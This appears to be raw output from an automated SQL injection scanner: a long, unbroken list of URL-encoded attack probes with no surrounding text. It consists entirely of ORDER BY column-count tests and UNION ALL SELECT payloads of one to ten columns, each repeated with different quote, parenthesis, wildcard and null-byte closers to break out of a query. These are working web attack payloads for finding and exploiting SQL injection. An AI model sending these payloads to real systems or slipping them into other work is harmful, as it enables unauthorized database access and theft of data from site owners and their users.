-1809%20WHERE%205943%3D5943%20ORDER%20BY%207793--%20 -6574%20WHERE%209643%3D9643%20UNION%20ALL%20SELECT%209643--%20 -3734%20WHERE%203271%3D3271%20UNION%20ALL%20SELECT%203271%2C3271--%20 -1602%20WHERE%206807%3D6807%20UNION%20ALL%20SELECT%206807%2C6807%2C6807--%20 -5619%20WHERE%206476%3D6476%20UNION%20ALL%20SELECT%206476%2C6476%2C6476%2C6476--%20 -3728%20WHERE%203515%3D3515%20UNION%20ALL%20SELECT%203515%2C3515%2C3515%2C3515%2C3515--%20 -6534%20WHERE%207068%3D7068%20UNION%20ALL%20SELECT%207068%2C7068%2C7068%2C7068%2C7068%2C7068--%20 -9432%20WHERE%204092%3D4092%20UNION%20ALL%20SELECT%204092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092--%20 -1386%20WHERE%208093%3D8093%20UNION%20ALL%20SELECT%208093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093%2C8093--%20 -4537%20WHERE%204854%3D4854%20UNION%20ALL%20SELECT%204854%2C4854%2C4854%2C4854%2C4854%2C4854%2C4854%2C4854%2C4854--%20 -3402%20WHERE%204604%3D4604%20UNION%20ALL%20SELECT%204604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604--%20 -3054%27%29%20ORDER%20BY%201--%20 -4648%27%29%20ORDER%20BY%202475--%20 -7523%27%29%20UNION%20ALL%20SELECT%207200--%20 -2414%27%29%20UNION%20ALL%20SELECT%208495%2C8495--%20 -7100%27%29%20UNION%20ALL%20SELECT%209232%2C9232%2C9232--%20 -2493%27%29%20UNION%20ALL%20SELECT%206873%2C6873%2C6873%2C6873--%20 -1779%27%29%20UNION%20ALL%20SELECT%206653%2C6653%2C6653%2C6653%2C6653--%20 -6574%27%29%20UNION%20ALL%20SELECT%204518%2C4518%2C4518%2C4518%2C4518%2C4518--%20 -3637%27%29%20UNION%20ALL%20SELECT%203597%2C3597%2C3597%2C3597%2C3597%2C3597%2C3597--%20 -9324%27%29%20UNION%20ALL%20SELECT%202168%2C2168%2C2168%2C2168%2C2168%2C2168%2C2168%2C2168--%20 -1733%27%29%20UNION%20ALL%20SELECT%208824%2C8824%2C8824%2C8824%2C8824%2C8824%2C8824%2C8824%2C8824--%20 -8447%27%29%20UNION%20ALL%20SELECT%209805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805%2C9805--%20 -2206%27%20ORDER%20BY%201--%20 -6582%27%20ORDER%20BY%205600--%20 -9839%27%20UNION%20ALL%20SELECT%202528--%20 -3947%27%20UNION%20ALL%20SELECT%208469%2C8469--%20 -9040%27%20UNION%20ALL%20SELECT%206186%2C6186%2C6186--%20 -8964%27%20UNION%20ALL%20SELECT%202196%2C2196%2C2196%2C2196--%20 -9152%27%20UNION%20ALL%20SELECT%206570%2C6570%2C6570%2C6570%2C6570--%20 -2057%27%20UNION%20ALL%20SELECT%203743%2C3743%2C3743%2C3743%2C3743%2C3743--%20 -2084%27%20UNION%20ALL%20SELECT%209898%2C9898%2C9898%2C9898%2C9898%2C9898%2C9898--%20 -2620%27%20UNION%20ALL%20SELECT%202568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568--%20 -6321%27%20UNION%20ALL%20SELECT%208214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214%2C8214--%20 -2792%27%20UNION%20ALL%20SELECT%206334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334--%20 -3071%22%20ORDER%20BY%201--%20 -9850%22%20ORDER%20BY%203408--%20 -6592%22%20UNION%20ALL%20SELECT%209392--%20 -2174%22%20UNION%20ALL%20SELECT%208134%2C8134--%20 -5981%22%20UNION%20ALL%20SELECT%206551%2C6551%2C6551--%20 -8237%22%20UNION%20ALL%20SELECT%204706%2C4706%2C4706%2C4706--%20 -4615%22%20UNION%20ALL%20SELECT%208132%2C8132%2C8132%2C8132%2C8132--%20 -8918%22%20UNION%20ALL%20SELECT%209556%2C9556%2C9556%2C9556%2C9556%2C9556--%20 -1158%22%20UNION%20ALL%20SELECT%201838%2C1838%2C1838%2C1838%2C1838%2C1838%2C1838--%20 -4697%22%20UNION%20ALL%20SELECT%204720%2C4720%2C4720%2C4720%2C4720%2C4720%2C4720%2C4720--%20 -8688%22%20UNION%20ALL%20SELECT%201539%2C1539%2C1539%2C1539%2C1539%2C1539%2C1539%2C1539%2C1539--%20 -1580%22%20UNION%20ALL%20SELECT%206888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888--%20 -2847%27%29%20ORDER%20BY%201--%20 -4657%27%29%20ORDER%20BY%203913--%20 -7688%27%29%20UNION%20ALL%20SELECT%207367--%20 -1516%27%29%20UNION%20ALL%20SELECT%206392%2C6392--%20 -1875%27%29%20UNION%20ALL%20SELECT%203094%2C3094%2C3094--%20 -3594%27%29%20UNION%20ALL%20SELECT%203495%2C3495%2C3495%2C3495--%20 -4770%27%29%20UNION%20ALL%20SELECT%204632%2C4632%2C4632%2C4632%2C4632--%20 -1546%27%29%20UNION%20ALL%20SELECT%204585%2C4585%2C4585%2C4585%2C4585%2C4585--%20 -1613%27%29%20UNION%20ALL%20SELECT%209430%2C9430%2C9430%2C9430%2C9430%2C9430%2C9430--%20 -5920%27%29%20UNION%20ALL%20SELECT%205417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417--%20 -6961%27%29%20UNION%20ALL%20SELECT%204955%2C4955%2C4955%2C4955%2C4955%2C4955%2C4955%2C4955%2C4955--%20 -3223%27%29%20UNION%20ALL%20SELECT%208318%2C8318%2C8318%2C8318%2C8318%2C8318%2C8318%2C8318%2C8318%2C8318--%20 -3940%27%29%29%20ORDER%20BY%201--%20 -7436%27%29%29%20ORDER%20BY%201290--%20 -2757%27%29%29%20UNION%20ALL%20SELECT%206035--%20 -9970%27%29%29%20UNION%20ALL%20SELECT%201353%2C1353--%20 -8026%27%29%29%20UNION%20ALL%20SELECT%203614%2C3614%2C3614--%20 -1050%27%29%29%20UNION%20ALL%20SELECT%201207%2C1207%2C1207%2C1207--%20 -4461%27%29%29%20UNION%20ALL%20SELECT%202536%2C2536%2C2536%2C2536%2C2536--%20 -2828%27%29%29%20UNION%20ALL%20SELECT%204550%2C4550%2C4550%2C4550%2C4550%2C4550--%20 -8533%27%29%29%20UNION%20ALL%20SELECT%202881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881--%20 -3099%27%29%29%20UNION%20ALL%20SELECT%203794%2C3794%2C3794%2C3794%2C3794%2C3794%2C3794%2C3794--%20 -8277%27%29%29%20UNION%20ALL%20SELECT%206770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770--%20 -6474%27%29%29%20UNION%20ALL%20SELECT%202060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060%2C2060--%20 -3902%27%29%29%29%20ORDER%20BY%201--%20 -4642%27%29%29%29%20ORDER%20BY%203442--%20 -5586%27%29%29%29%20UNION%20ALL%20SELECT%207767--%20 -8975%27%29%29%29%20UNION%20ALL%20SELECT%201639%2C1639--%20 -3606%27%29%29%29%20UNION%20ALL%20SELECT%204701%2C4701%2C4701--%20 -7295%27%29%29%29%20UNION%20ALL%20SELECT%206367%2C6367%2C6367%2C6367--%20 -8971%27%29%29%29%20UNION%20ALL%20SELECT%207471%2C7471%2C7471%2C7471%2C7471--%20 -3956%27%29%29%29%20UNION%20ALL%20SELECT%209848%2C9848%2C9848%2C9848%2C9848%2C9848--%20 -8468%27%29%29%29%20UNION%20ALL%20SELECT%206051%2C6051%2C6051%2C6051%2C6051%2C6051%2C6051--%20 -7184%27%29%29%29%20UNION%20ALL%20SELECT%204829%2C4829%2C4829%2C4829%2C4829%2C4829%2C4829%2C4829--%20 -6117%27%29%29%29%20UNION%20ALL%20SELECT%206121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121%2C6121--%20 -3365%27%29%29%29%20UNION%20ALL%20SELECT%208055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055%2C8055--%20 -1844%27%20ORDER%20BY%201--%20 -6755%27%20ORDER%20BY%209531--%20 -6748%27%20UNION%20ALL%20SELECT%201523--%20 -7876%27%20UNION%20ALL%20SELECT%207031%2C7031--%20 -4428%27%20UNION%20ALL%20SELECT%201322%2C1322%2C1322--%20 -1160%27%20UNION%20ALL%20SELECT%208944%2C8944%2C8944%2C8944--%20 -7723%27%20UNION%20ALL%20SELECT%207295%2C7295%2C7295%2C7295%2C7295--%20 -1996%27%20UNION%20ALL%20SELECT%206031%2C6031%2C6031%2C6031%2C6031%2C6031--%20 -2921%27%20UNION%20ALL%20SELECT%209177%2C9177%2C9177%2C9177%2C9177%2C9177%2C9177--%20 -8338%27%20UNION%20ALL%20SELECT%203118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118--%20 -3329%27%20UNION%20ALL%20SELECT%205195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195%2C5195--%20 -5999%27%20UNION%20ALL%20SELECT%201388%2C1388%2C1388%2C1388%2C1388%2C1388%2C1388%2C1388%2C1388%2C1388--%20 -3563%27%29%20ORDER%20BY%201--%20 -1415%27%29%20ORDER%20BY%204262--%20 -7740%27%29%20UNION%20ALL%20SELECT%208487--%20 -5013%27%29%20UNION%20ALL%20SELECT%201193%2C1193--%20 -3273%27%29%20UNION%20ALL%20SELECT%207070%2C7070%2C7070--%20 -2068%27%29%20UNION%20ALL%20SELECT%206800%2C6800%2C6800%2C6800--%20 -6898%27%29%20UNION%20ALL%20SELECT%202216%2C2216%2C2216%2C2216%2C2216--%20 -3198%27%29%20UNION%20ALL%20SELECT%204693%2C4693%2C4693%2C4693%2C4693%2C4693--%20 -1988%27%29%20UNION%20ALL%20SELECT%204491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491--%20 -7178%27%29%20UNION%20ALL%20SELECT%203729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729%2C3729--%20 -4749%27%29%20UNION%20ALL%20SELECT%205450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450%2C5450--%20 -8667%27%29%20UNION%20ALL%20SELECT%205151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151--%20 -6265%27%29%29%20ORDER%20BY%201--%20 -3562%27%29%29%20ORDER%20BY%206925--%20 -3641%27%29%29%20UNION%20ALL%20SELECT%205906--%20 -6320%27%29%29%20UNION%20ALL%20SELECT%203036%2C3036--%20 -2612%27%29%29%20UNION%20ALL%20SELECT%201619%2C1619%2C1619--%20 -7633%27%29%29%20UNION%20ALL%20SELECT%205785%2C5785%2C5785%2C5785--%20 -8089%27%29%29%20UNION%20ALL%20SELECT%208128%2C8128%2C8128%2C8128%2C8128--%20 -9569%27%29%29%20UNION%20ALL%20SELECT%204714%2C4714%2C4714%2C4714%2C4714%2C4714--%20 -9851%27%29%29%20UNION%20ALL%20SELECT%203580%2C3580%2C3580%2C3580%2C3580%2C3580%2C3580--%20 -8227%27%29%29%20UNION%20ALL%20SELECT%209896%2C9896%2C9896%2C9896%2C9896%2C9896%2C9896%2C9896--%20 -2023%27%29%29%20UNION%20ALL%20SELECT%209727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727--%20 -9369%27%29%29%20UNION%20ALL%20SELECT%205327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327--%20 -5021%27%29%29%29%20ORDER%20BY%201--%20 -9453%27%29%29%29%20ORDER%20BY%201298--%20 -7102%27%29%29%29%20UNION%20ALL%20SELECT%206435--%20 -2134%27%29%29%29%20UNION%20ALL%20SELECT%203562%2C3562--%20 -1004%27%29%29%29%20UNION%20ALL%20SELECT%205309%2C5309%2C5309--%20 -7084%27%29%29%29%20UNION%20ALL%20SELECT%208832%2C8832%2C8832%2C8832--%20 -2848%27%29%29%29%20UNION%20ALL%20SELECT%209344%2C9344%2C9344%2C9344%2C9344--%20 -4827%27%29%29%29%20UNION%20ALL%20SELECT%209380%2C9380%2C9380%2C9380%2C9380%2C9380--%20 -2503%27%29%29%29%20UNION%20ALL%20SELECT%206442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442--%20 -1444%27%29%29%29%20UNION%20ALL%20SELECT%202424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424--%20 -5736%27%29%29%29%20UNION%20ALL%20SELECT%202983%2C2983%2C2983%2C2983%2C2983%2C2983%2C2983%2C2983%2C2983--%20 -8216%27%29%29%29%20UNION%20ALL%20SELECT%207533%2C7533%2C7533%2C7533%2C7533%2C7533%2C7533%2C7533%2C7533%2C7533--%20 -8406%27%20ORDER%20BY%201--%20 -6039%27%20ORDER%20BY%207063--%20 -3318%27%20UNION%20ALL%20SELECT%202575--%20 -9898%27%20UNION%20ALL%20SELECT%206218%2C6218--%20 -9664%27%20UNION%20ALL%20SELECT%205413%2C5413%2C5413--%20 -5670%27%20UNION%20ALL%20SELECT%205948%2C5948%2C5948%2C5948--%20 -8012%27%20UNION%20ALL%20SELECT%206406%2C6406%2C6406%2C6406%2C6406--%20 -1309%27%20UNION%20ALL%20SELECT%204951%2C4951%2C4951%2C4951%2C4951%2C4951--%20 -9787%27%20UNION%20ALL%20SELECT%208491%2C8491%2C8491%2C8491%2C8491%2C8491%2C8491--%20 -5787%27%20UNION%20ALL%20SELECT%208619%2C8619%2C8619%2C8619%2C8619%2C8619%2C8619%2C8619--%20 -1472%27%20UNION%20ALL%20SELECT%207924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924--%20 -9658%27%20UNION%20ALL%20SELECT%205829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829--%20 -1815%22%29%20ORDER%20BY%201--%20 -7307%22%29%20ORDER%20BY%208268--%20 -1746%22%29%20UNION%20ALL%20SELECT%207227--%20 -9622%22%29%20UNION%20ALL%20SELECT%208077%2C8077--%20 -3319%22%29%20UNION%20ALL%20SELECT%201826%2C1826%2C1826--%20 -9270%22%29%20UNION%20ALL%20SELECT%204542%2C4542%2C4542%2C4542--%20 -2897%22%29%20UNION%20ALL%20SELECT%208304%2C8304%2C8304%2C8304%2C8304--%20 -4610%22%29%20UNION%20ALL%20SELECT%207338%2C7338%2C7338%2C7338%2C7338%2C7338--%20 -5453%22%29%20UNION%20ALL%20SELECT%206309%2C6309%2C6309%2C6309%2C6309%2C6309%2C6309--%20 -6425%22%29%20UNION%20ALL%20SELECT%206272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272--%20 -9404%22%29%20UNION%20ALL%20SELECT%203462%2C3462%2C3462%2C3462%2C3462%2C3462%2C3462%2C3462%2C3462--%20 -3342%22%29%20UNION%20ALL%20SELECT%203557%2C3557%2C3557%2C3557%2C3557%2C3557%2C3557%2C3557%2C3557%2C3557--%20 -9263%22%29%29%20ORDER%20BY%201--%20 -7216%22%29%29%20ORDER%20BY%205392--%20 -7092%22%29%29%20UNION%20ALL%20SELECT%206263--%20 -5330%22%29%29%20UNION%20ALL%20SELECT%208117%2C8117--%20 -6297%22%29%29%20UNION%20ALL%20SELECT%202132%2C2132%2C2132--%20 -6332%22%29%29%20UNION%20ALL%20SELECT%202903%2C2903%2C2903%2C2903--%20 -9282%22%29%29%20UNION%20ALL%20SELECT%203640%2C3640%2C3640%2C3640%2C3640--%20 -3618%22%29%29%20UNION%20ALL%20SELECT%205104%2C5104%2C5104%2C5104%2C5104%2C5104--%20 -6079%22%29%29%20UNION%20ALL%20SELECT%209995%2C9995%2C9995%2C9995%2C9995%2C9995%2C9995--%20 -4565%22%29%29%20UNION%20ALL%20SELECT%206866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866--%20 -6187%22%29%29%20UNION%20ALL%20SELECT%205458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458--%20 -2917%22%29%29%20UNION%20ALL%20SELECT%209431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431--%20 -3925%22%29%29%29%20ORDER%20BY%201--%20 -1093%22%29%29%29%20ORDER%20BY%206676--%20 -5464%22%29%29%29%20UNION%20ALL%20SELECT%208415--%20 -7783%22%29%29%29%20UNION%20ALL%20SELECT%209507%2C9507--%20 -5882%22%29%29%29%20UNION%20ALL%20SELECT%206762%2C6762%2C6762--%20 -6845%22%29%29%29%20UNION%20ALL%20SELECT%203315%2C3315%2C3315%2C3315--%20 -5843%22%29%29%29%20UNION%20ALL%20SELECT%201784%2C1784%2C1784%2C1784%2C1784--%20 -7294%22%29%29%29%20UNION%20ALL%20SELECT%204013%2C4013%2C4013%2C4013%2C4013%2C4013--%20 -3175%22%29%29%29%20UNION%20ALL%20SELECT%209882%2C9882%2C9882%2C9882%2C9882%2C9882%2C9882--%20 -3558%22%29%29%29%20UNION%20ALL%20SELECT%203528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528--%20 -2082%22%29%29%29%20UNION%20ALL%20SELECT%205023%2C5023%2C5023%2C5023%2C5023%2C5023%2C5023%2C5023%2C5023--%20 -4412%22%29%29%29%20UNION%20ALL%20SELECT%204648%2C4648%2C4648%2C4648%2C4648%2C4648%2C4648%2C4648%2C4648%2C4648--%20 -3338%22%20ORDER%20BY%201--%20 -5974%22%20ORDER%20BY%207036--%20 -3279%22%20UNION%20ALL%20SELECT%205179--%20 -6007%22%20UNION%20ALL%20SELECT%202494%2C2494--%20 -3446%22%20UNION%20ALL%20SELECT%201883%2C1883%2C1883--%20 -2704%22%20UNION%20ALL%20SELECT%206752%2C6752%2C6752%2C6752--%20 -9591%22%20UNION%20ALL%20SELECT%208200%2C8200%2C8200%2C8200%2C8200--%20 -1131%22%20UNION%20ALL%20SELECT%209140%2C9140%2C9140%2C9140%2C9140%2C9140--%20 -2950%22%20UNION%20ALL%20SELECT%208468%2C8468%2C8468%2C8468%2C8468%2C8468%2C8468--%20 -5210%22%20UNION%20ALL%20SELECT%201897%2C1897%2C1897%2C1897%2C1897%2C1897%2C1897%2C1897--%20 -9902%22%20UNION%20ALL%20SELECT%204868%2C4868%2C4868%2C4868%2C4868%2C4868%2C4868%2C4868%2C4868--%20 -9727%22%20UNION%20ALL%20SELECT%202779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779--%20 -6581%22%29%20ORDER%20BY%201--%20 -8980%22%29%20ORDER%20BY%202993--%20 -9717%22%29%20UNION%20ALL%20SELECT%202570--%20 -7886%22%29%20UNION%20ALL%20SELECT%204006%2C4006--%20 -5630%22%29%20UNION%20ALL%20SELECT%206008%2C6008%2C6008--%20 -9252%22%29%20UNION%20ALL%20SELECT%204536%2C4536%2C4536%2C4536--%20 -5557%22%29%20UNION%20ALL%20SELECT%201144%2C1144%2C1144%2C1144%2C1144--%20 -5618%22%29%20UNION%20ALL%20SELECT%205419%2C5419%2C5419%2C5419%2C5419%2C5419--%20 -8624%22%29%20UNION%20ALL%20SELECT%208476%2C8476%2C8476%2C8476%2C8476%2C8476%2C8476--%20 -4274%22%29%20UNION%20ALL%20SELECT%204919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919--%20 -7267%22%29%20UNION%20ALL%20SELECT%203819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819--%20 -6277%22%29%20UNION%20ALL%20SELECT%206190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190--%20 -8950%22%29%29%20ORDER%20BY%201--%20 -3143%22%29%29%20ORDER%20BY%202297--%20 -9120%22%29%29%20UNION%20ALL%20SELECT%208757--%20 -9183%22%29%29%20UNION%20ALL%20SELECT%204154%2C4154--%20 -3761%22%29%29%20UNION%20ALL%20SELECT%205877%2C5877%2C5877--%20 -1837%22%29%29%20UNION%20ALL%20SELECT%208040%2C8040%2C8040%2C8040--%20 -5211%22%29%29%20UNION%20ALL%20SELECT%209308%2C9308%2C9308%2C9308%2C9308--%20 -4081%22%29%29%20UNION%20ALL%20SELECT%205069%2C5069%2C5069%2C5069%2C5069%2C5069--%20 -7103%22%29%29%20UNION%20ALL%20SELECT%203117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117--%20 -1823%22%29%29%20UNION%20ALL%20SELECT%203562%2C3562%2C3562%2C3562%2C3562%2C3562%2C3562%2C3562--%20 -7074%22%29%29%20UNION%20ALL%20SELECT%206925%2C6925%2C6925%2C6925%2C6925%2C6925%2C6925%2C6925%2C6925--%20 -4592%22%29%29%20UNION%20ALL%20SELECT%208216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216--%20 -4045%22%29%29%29%20ORDER%20BY%201--%20 -2855%22%29%29%29%20ORDER%20BY%208328--%20 -8974%22%29%29%29%20UNION%20ALL%20SELECT%209519--%20 -7654%22%29%29%29%20UNION%20ALL%20SELECT%208213%2C8213--%20 -8991%22%29%29%29%20UNION%20ALL%20SELECT%203742%2C3742%2C3742--%20 -5174%22%29%29%29%20UNION%20ALL%20SELECT%205318%2C5318%2C5318%2C5318--%20 -8530%22%29%29%29%20UNION%20ALL%20SELECT%206881%2C6881%2C6881%2C6881%2C6881--%20 -7750%22%29%29%29%20UNION%20ALL%20SELECT%203949%2C3949%2C3949%2C3949%2C3949%2C3949--%20 -4550%22%29%29%29%20UNION%20ALL%20SELECT%206573%2C6573%2C6573%2C6573%2C6573%2C6573%2C6573--%20 -5572%22%29%29%29%20UNION%20ALL%20SELECT%209540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540--%20 -8958%22%29%29%29%20UNION%20ALL%20SELECT%206735%2C6735%2C6735%2C6735%2C6735%2C6735%2C6735%2C6735%2C6735--%20 -2612%22%29%29%29%20UNION%20ALL%20SELECT%209198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198--%20 -8165%22%20ORDER%20BY%201--%20 -7192%22%20ORDER%20BY%206857--%20 -3656%22%20UNION%20ALL%20SELECT%204576--%20 -1820%22%20UNION%20ALL%20SELECT%206862%2C6862--%20 -9456%22%20UNION%20ALL%20SELECT%206516%2C6516%2C6516--%20 -2677%22%20UNION%20ALL%20SELECT%201303%2C1303%2C1303%2C1303--%20 -9318%22%20UNION%20ALL%20SELECT%203135%2C3135%2C3135%2C3135%2C3135--%20 -5200%22%20UNION%20ALL%20SELECT%207584%2C7584%2C7584%2C7584%2C7584%2C7584--%20 -6417%22%20UNION%20ALL%20SELECT%202695%2C2695%2C2695%2C2695%2C2695%2C2695%2C2695--%20 -1877%22%20UNION%20ALL%20SELECT%209744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744--%20 -5776%22%20UNION%20ALL%20SELECT%201806%2C1806%2C1806%2C1806%2C1806%2C1806%2C1806%2C1806%2C1806--%20 -9214%22%20UNION%20ALL%20SELECT%202587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587%2C2587--%20 -6604%25%27%29%20ORDER%20BY%201--%20 -1154%25%27%29%20ORDER%20BY%201402--%20 -2126%25%27%29%20UNION%20ALL%20SELECT%206741--%20 -2807%25%27%29%20UNION%20ALL%20SELECT%201871%2C1871--%20 -3956%25%27%29%20UNION%20ALL%20SELECT%208175%2C8175%2C8175--%20 -3628%25%27%29%20UNION%20ALL%20SELECT%207634%2C7634%2C7634%2C7634--%20 -9139%25%27%29%20UNION%20ALL%20SELECT%208092%2C8092%2C8092%2C8092%2C8092--%20 -3424%25%27%29%20UNION%20ALL%20SELECT%204756%2C4756%2C4756%2C4756%2C4756%2C4756--%20 -7005%25%27%29%20UNION%20ALL%20SELECT%204784%2C4784%2C4784%2C4784%2C4784%2C4784%2C4784--%20 -1242%25%27%29%20UNION%20ALL%20SELECT%204627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627%2C4627--%20 -1202%25%27%29%20UNION%20ALL%20SELECT%201062%2C1062%2C1062%2C1062%2C1062%2C1062%2C1062%2C1062%2C1062--%20 -5243%25%27%29%20UNION%20ALL%20SELECT%209959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959--%20 -9662%25%27%29%29%20ORDER%20BY%201--%20 -5096%25%27%29%29%20ORDER%20BY%204130--%20 -3241%25%27%29%29%20UNION%20ALL%20SELECT%203595--%20 -3042%25%27%29%29%20UNION%20ALL%20SELECT%202570%2C2570--%20 -8321%25%27%29%29%20UNION%20ALL%20SELECT%205431%2C5431%2C5431--%20 -7685%25%27%29%29%20UNION%20ALL%20SELECT%205929%2C5929%2C5929%2C5929--%20 -1069%25%27%29%29%20UNION%20ALL%20SELECT%207611%2C7611%2C7611%2C7611%2C7611--%20 -4315%25%27%29%29%20UNION%20ALL%20SELECT%204471%2C4471%2C4471%2C4471%2C4471%2C4471--%20 -7253%25%27%29%29%20UNION%20ALL%20SELECT%203101%2C3101%2C3101%2C3101%2C3101%2C3101%2C3101--%20 -4359%25%27%29%29%20UNION%20ALL%20SELECT%204840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840%2C4840--%20 -2728%25%27%29%29%20UNION%20ALL%20SELECT%207112%2C7112%2C7112%2C7112%2C7112%2C7112%2C7112%2C7112%2C7112--%20 -5863%25%27%29%29%20UNION%20ALL%20SELECT%202726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726--%20 -4685%25%27%29%29%29%20ORDER%20BY%201--%20 -1875%25%27%29%29%29%20ORDER%20BY%207354--%20 -1272%25%27%29%29%29%20UNION%20ALL%20SELECT%206733--%20 -6847%25%27%29%29%29%20UNION%20ALL%20SELECT%206618%2C6618--%20 -2321%25%27%29%29%29%20UNION%20ALL%20SELECT%209040%2C9040%2C9040--%20 -6994%25%27%29%29%29%20UNION%20ALL%20SELECT%208919%2C8919%2C8919%2C8919--%20 -6129%25%27%29%29%29%20UNION%20ALL%20SELECT%203804%2C3804%2C3804%2C3804%2C3804--%20 -6695%25%27%29%29%29%20UNION%20ALL%20SELECT%202934%2C2934%2C2934%2C2934%2C2934%2C2934--%20 -2494%25%27%29%29%29%20UNION%20ALL%20SELECT%205845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845--%20 -3439%25%27%29%29%29%20UNION%20ALL%20SELECT%205135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135--%20 -8029%25%27%29%29%29%20UNION%20ALL%20SELECT%206270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270--%20 -5694%25%27%29%29%29%20UNION%20ALL%20SELECT%208904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904--%20 -5567%25%27%20ORDER%20BY%201--%20 -2301%25%27%20ORDER%20BY%209397--%20 -9906%25%27%20UNION%20ALL%20SELECT%202261--%20 -9540%25%27%20UNION%20ALL%20SELECT%207443%2C7443--%20 -3345%25%27%20UNION%20ALL%20SELECT%208408%2C8408%2C8408--%20 -7527%25%27%20UNION%20ALL%20SELECT%201281%2C1281%2C1281%2C1281--%20 -6700%25%27%20UNION%20ALL%20SELECT%207366%2C7366%2C7366%2C7366%2C7366--%20 -6142%25%27%20UNION%20ALL%20SELECT%203643%2C3643%2C3643%2C3643%2C3643%2C3643--%20 -4022%25%27%20UNION%20ALL%20SELECT%201917%2C1917%2C1917%2C1917%2C1917%2C1917%2C1917--%20 -7202%25%27%20UNION%20ALL%20SELECT%208562%2C8562%2C8562%2C8562%2C8562%2C8562%2C8562%2C8562--%20 -2415%25%27%20UNION%20ALL%20SELECT%208528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528--%20 -7973%25%27%20UNION%20ALL%20SELECT%202762%2C2762%2C2762%2C2762%2C2762%2C2762%2C2762%2C2762%2C2762%2C2762--%20 -2606%00%27%29%20ORDER%20BY%201--%20 -1537%00%27%29%20ORDER%20BY%205573--%20 -9265%00%27%29%20UNION%20ALL%20SELECT%209143--%20 -4608%00%27%29%20UNION%20ALL%20SELECT%204325%2C4325--%20 -3459%00%27%29%20UNION%20ALL%20SELECT%202314%2C2314%2C2314--%20 -4880%00%27%29%20UNION%20ALL%20SELECT%203788%2C3788%2C3788%2C3788--%20 -9359%00%27%29%20UNION%20ALL%20SELECT%207215%2C7215%2C7215%2C7215%2C7215--%20 -7218%00%27%29%20UNION%20ALL%20SELECT%202446%2C2446%2C2446%2C2446%2C2446%2C2446--%20 -8061%00%27%29%20UNION%20ALL%20SELECT%203983%2C3983%2C3983%2C3983%2C3983%2C3983%2C3983--%20 -5442%00%27%29%20UNION%20ALL%20SELECT%208167%2C8167%2C8167%2C8167%2C8167%2C8167%2C8167%2C8167--%20 -5902%00%27%29%20UNION%20ALL%20SELECT%207208%2C7208%2C7208%2C7208%2C7208%2C7208%2C7208%2C7208%2C7208--%20 -9563%00%27%29%20UNION%20ALL%20SELECT%203545%2C3545%2C3545%2C3545%2C3545%2C3545%2C3545%2C3545%2C3545%2C3545--%20 -5258%00%27%20ORDER%20BY%201--%20 -9536%00%27%20ORDER%20BY%201129--%20 -9927%00%27%20UNION%20ALL%20SELECT%201056--%20 -3811%00%27%20UNION%20ALL%20SELECT%202293%2C2293--%20 -4678%00%27%20UNION%20ALL%20SELECT%209384%2C9384%2C9384--%20 -2422%00%27%20UNION%20ALL%20SELECT%208763%2C8763%2C8763%2C8763--%20 -6545%00%27%20UNION%20ALL%20SELECT%202247%2C2247%2C2247%2C2247%2C2247--%20 